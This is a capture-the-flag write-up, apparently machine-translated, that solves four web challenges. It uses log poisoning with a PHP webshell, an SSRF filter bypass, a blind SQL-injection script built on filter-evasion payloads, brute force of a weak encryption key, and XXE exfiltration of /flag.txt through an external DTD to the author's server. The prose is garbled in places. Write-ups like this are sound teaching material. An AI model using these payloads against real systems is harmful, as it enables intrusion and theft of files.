Article Directory
Foreword: I hope I can gradually change day by day
Sign in_guanji
First I tried a wave of data pseudo-protocols and found that it was banned. After thinking about it for a long time, I forgot that the log contained harm.file=/var/log/nginx/access.log
Try UA
to put a word Trojan horse
Wuhu, take off!
system("ls /");
End
web1_view word
Code audit, the title means that we want curl http://192.168.7.68/flag
to get the flag from the echo we passed , but it .
was filtered, and then I thought of converting the ip to a number, which is equivalent 192.168.1.100
to 3232237668
this (digital address and IP address), but this question is filtered 0 I rely on, and finally see the wp of the masters can be used 。
instead.
<?php
#flag in http://192.168.7.68/flag
if(isset($_GET['url'])){
$url = $_GET['url'];
$protocol = substr($url, 0,7);
if($protocol!='http://'){
die('仅限http协议访问');
}
if(preg_match('/\.|\;|\||\<|\>|\*|\%|\^|\(|\)|\#|\@|\!|\`|\~|\+|\'|\"|\.|\,|\?|\[|\]|\{|\}|\!|\&|\$|0/', $url)){
die('仅限域名地址访问');
}
system('curl '.$url);
}
Finally got the flag
web2_gazing
You can see it at a glance sql注入
. After fuzzing, I found a bunch of disabled functions. The
regular sql blind injection payload is roughly the same,
1^if(1=1,1,0)
but we can’t use it now.
Spaces can be filtered out and can be replaced by parentheses;
single quotes can be filtered in hexadecimal Replace;
filter the comma, for substr you can use substr(database() from 1 for 1) instead of substr(database(),1,1)
If there is a comma, you can use case when instead of if;
filter ascii and you can use ord instead;
After filtering the equal sign and like, you can use regexp instead.
So the above regular statement can be transformed into
id=1^case(ord(substr(database()from(1)for(1))))when(102)then(2)else(3)end
import requests
import time
url = "http://0d7d7067-4ff7-4557-a713-af5bd4d3ed35.chall.ctf.show/index.php?id=0^"
flag = ""
for i in range(1, 50):
for j in range(38, 126):
# payload="case(ord(substr(database()from({0})for(1))))when({1})then(1)else(2)end".format(i,j)
# payload="case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(1)else(2)end".format(i,j)
# payload="case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({0})for(1))))when({1})then(1)else(2)end".format(i,j)
payload = "case(ord(substr((select(group_concat(flag))from(flag))from({0})for(1))))when({1})then(1)else(2)end".format(i, j)
u = url + payload
r = requests.get(u)
time.sleep(0.3)
if "By Rudyard Kipling" in r.text:
flag += chr(j)
print(flag)
break
web3_view picture
First check the source code and found this. Using base64 decryption, it was found to be a bunch of garbled codes.
After removing the image parameter, the source code appears . As we see in the official PHP documentation, it is feasible to blast
Note: On some platforms (such as Windows) getrandmax() is only 32767. If the required range is greater than 32767, then specify the min
and max parameters to generate a larger number, or consider using mt_rand() instead.
The last burst is 27347
/*author
Y4tacker
*/
<?php
for($i=0;$i<32768;$i++){
$key = substr(md5('ctfshow'.$i),3,8);
$image="Z6Ilu83MIDw=";
$str = openssl_decrypt($image, 'bf-ecb', $key);
if(strpos($str,"jpg") or strpos($str,"png") or strpos($str,"gif")){
print($i);
break;
}
}
The next step is to take the key to generate it
<?php
/*author
Y4tacker
*/
$rand=27347;
$key = substr(md5('ctfshow'.$rand),3,8);
$image="config.php";
$str = openssl_encrypt($image, 'bf-ecb', $key);
echo $str;
End
web4_view heart
I also played a bit first. Fuck is really like this. I guessed it. Next, we check the source code of the webpage and get a prompt <!-- flag in filesystem /flag.txt -->
. To be honest, I was blinded. Then I went to look at WP and saw XXE, hh seconds to understand, of course, WP have not read I'm going down on her own, go to my VPS and do some thinking we used here is the 通过DTD窃取文件
first of a xml file
<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://test.y4tacker.top/evil.dtd">
Next
<!ENTITY % p1 SYSTEM "php://filter/read=convert-base64.encode/resource=/flag.txt">
<!ENTITY % p2 "<!ENTITY xxe SYSTEM 'http://我服务器的ip:7999/?pass=%p1;'>">
%p2;
After that, I turned on monitoring on another server of mine.
Ah this, hastily monitoring is useless, I don’t know why, anyway, the page reported an error with a flag
, but guess it should be the cause of the internal network environment.
Reference article
SSRF bypass method summary
XXE vulnerability exploitation techniques: from XML to remote code execution